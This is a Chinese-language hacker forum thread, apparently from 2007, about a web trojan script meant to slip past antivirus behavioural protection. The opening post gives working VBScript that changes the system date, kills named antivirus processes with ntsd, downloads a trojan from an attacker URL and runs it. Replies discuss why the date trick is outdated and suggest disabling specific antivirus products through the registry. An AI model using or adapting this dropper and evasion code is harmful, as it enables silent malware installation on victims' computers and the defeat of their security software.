[讨论]一个延时过主动防御网马
议题作者:185810581信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
初来报道写个菜菜的一个延时过主动防御网马
秒数代表正常日期几秒后改回,30代表30秒,延时的单位1000代表1秒
on error resume next
Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="杀进程1" or ps.name="杀进程2" or ps.name="杀进程3如此类推" then
a.run "ntsd -c q -p ps.handle",0
end if:next
b = ("下载的马儿保存地址"):c = ("马儿地址")
wscript.sleep 延时
Set d = CreateObject("Microsoft.XMLHTTP")
d.Open "GET",c,0
d.Send()
Set e = CreateObject("ADODB.Stream")
e.Mode = 3
e.Type = 1
e.Open()
e.Write(d.responseBody)
e.SaveToFile b
a.run b 秒数 改为 %1 可以直接传参 这脚本只能当科普用.
你得首先把防止时间被更改的驱动过了~
antiARP,MicroPoint,360的附属产品。。。
都已经用驱动保护系统时间了。你如何搞?
主防不是这样过的~~~[s:267] 修改时间是不行的啦,瑞星2008,江民等,你一改时间就报。。傻了吧兄弟,这个过时了 那楼上的 现在怎么过呢/ 一个延时过主动防御网马?????????
这段代码 可以在网页上执行??
为什么不直接执行
Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide
net user 等 [quote]引用第4楼明明于2007-11-15 16:04发表的 :
那楼上的 现在怎么过呢/[/quote]
呵呵,用瑞星没有HOOK的API函数修改注册表,废掉瑞星,金山同理(需要先判断安装的杀软!),接下来想要干嘛就干嘛吧……
页:
[1]